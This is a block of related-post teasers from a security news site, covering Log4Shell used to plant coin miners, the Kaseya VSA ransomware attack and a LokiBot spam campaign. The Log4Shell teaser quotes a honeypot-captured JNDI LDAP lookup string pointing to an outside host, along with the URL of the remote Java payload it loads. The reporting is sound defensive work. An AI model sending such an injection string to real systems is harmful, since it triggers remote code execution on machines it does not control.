You might be interested in …

[SANS ISC] Log4Shell exploited to implant coin miners, (Mon, Dec 13th)

All posts, Sans-ISC

Analyzing the ISC honeypots’ requests, I found out that coin miners just included Log4Shell into their arsenal.  The request that hit our honeypot is trying to make vulnerable log4j load the address ‘jndi:ldap://45[.]83.193.150:1389/Exploit’. This will make log4j load and instantiate a malicious payload hosted at ‘http://31[.]220.58.29/Exploit.class’. I could find the payload address by doing a […]

Read More

[SANS ISC] Kaseya VSA Users Hit by Ransomware, (Fri, Jul 2nd)

All posts, Sans-ISC

We are aware that some MSSP’s customers (Managed Security Services Providers) have been hit by a ransomware. It seems that four(4) MSSP’s have been affected until now. The ransomware was spread through the remote management solution “VSA”  provided by Kaseya[1]. This looks to be a brand new type of supply chain attack. What we know so far? […]

Read More

Daily NCSC-FI news followup 2019-09-09

Newly Discovered Infostealer Attack Uses LokiBot www.fortinet.com/blog/threat-research/new-infostealer-attack-uses-lokibot.html The FortiGuard Labs SE team identified a new malicious spam campaign on August 21st,, which we discovered after an analysis of information initially found on VirusTotal. It targeted a large US manufacturing company utilizing the well documented infostealer LokiBot. Interestingly enough, this also has a compilation date of […]

Read More

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.